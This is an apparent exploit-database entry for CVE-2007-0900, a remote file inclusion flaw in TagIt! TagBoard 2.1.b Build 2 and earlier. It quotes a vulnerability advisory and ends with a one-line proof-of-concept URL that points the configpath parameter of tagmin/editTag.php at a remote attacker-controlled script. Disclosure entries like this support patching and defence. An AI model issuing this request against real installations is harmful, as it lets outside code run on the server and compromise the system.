Tagit! Tagit2b 2.1.B Build 2 tagmin/editTag.php configpath Parameter Remote File Inclusion. CVE-2007-0900. Webapps exploit for php platform
source: http://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. TagBoard 2.1.b Build 2 and prior versions are vulnerable. http://www.example.com/[TagIt_path]/tagmin/editTag.php?configpath=http://example2.com/evil?